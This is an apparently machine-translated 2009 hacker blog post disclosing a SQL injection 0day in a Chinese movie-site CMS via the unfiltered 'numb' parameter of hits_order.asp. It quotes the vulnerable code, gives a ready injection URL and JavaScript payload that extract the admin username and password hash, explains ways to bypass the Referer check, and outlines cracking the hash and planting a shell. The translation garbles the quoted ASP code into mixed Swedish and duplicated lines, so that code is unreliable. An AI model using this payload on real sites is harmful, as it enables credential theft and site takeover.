Eye-dagars film systemet 0day-0day, hits_order.asp, injektion, öga-dagars film-system,-st0p blogg

Eye-dagars film systemet 0day

Detta inlägg postades den 25 oktober 2009

: St0p & My5t3ry
Reproduceras, ange källan http://www.st0p.org

Åh, och My5t3ry komma med hålet, kontakta den officiella administratören, har inte uppmärksamhet till mig.

Låt mig först injicera problemet

Den kryphål filen / p_inc / hits_order.asp

  <- # Include file = ".. / P_inc / config.asp" ->
 <- # Include file = ".. / P_inc / function.asp" ->
 <- # Include file = ".. / P_inc / function_func.asp" ->
 <- # Include file = ".. / P_inc / openconn.asp" ->
 <- # Include file = ".. / P_inc / G_function.asp" ->
 <%
 Then Om inte ChkPost () Sedan
	 G_error_page_1 svar. Omdirigera G_error_page_1
	 ( ) svar Avsluta ()
 End If
 "Ring ChkPost filen / p_inc / function.asp file () för att upptäcka källan URL
 url,numb ) Funktion G_hitss (url, stel)
	 Dim str
	 str = ""
	 & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" sql = "select top" & numb & "id, m_name, m_pic, m_hits, m_content från qingtiandy_movie där m_look = 1 Sortera efter m_hits fallande, id desc"
             "Jag såg det inte bedöva inget filter
	 server . CreateObject ( G_RS ) Set rs = server. CreateObject (G_RS)
	 , 1 rs. öppna sql, ansl, 1, 1
	 i = 1
	 Gör Även om inte RS. Eof 
		 Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", RS (0), url))
		 "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演：" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = den str & "den <div class=kkk1_list> <a class=bbb href=" & d_url &" title='主演:" & rs (2) & "'>" & Get_length (rs (1), "", 32) & "</ a> (" & rs (3) & ") </ div>
		 i = i + 1
		 rs. movenext
	 Slinga
	 G_hitss = str
 Änden Funktion
 %>
 G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ("<% = G_hitss (Request (" url "), begäran (" Numb "))%>")
 "Här numb filter

Användning av metoder såsom
1, kan du direkt använda programvaran smidda Referer finns på följande adress för att uppnå
Genom XMLHTTP förfalskat Referer finns på följande adress genomförandet
3, genom JS JAVASCRIPT styra källan URL

En

  ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript:. dokumentet skriva (<a href='/p_inc/hits_order.asp?numb=1 (select str_username från tbl_admin) så username,(select str_pass från tbl_admin) som pass,'> science fiction </ a> ") ;

http://www.st0p.org/p_inc/hits_order.asp?numb=1 (välj str_username från tbl_admin) som användarnamn (välj str_pass från tbl_admin) som pass,

Anmärkning: för att hoppa över Referer detektering kan ske genom POST, GET den COOKIE av en mängd olika sätt för att uppnå injiceras. . .

Tillgång till följande administratören användarnamn i URL av länken, lösenord HASH visas direkt ut. .

Knäcka lösenord hash eftersom bakgrunden kan direkt redigera ASP-filen, i bakgrunden och ta SHELL linjen.

Detta förfarande, det finns andra kryphål. Här görs inte. .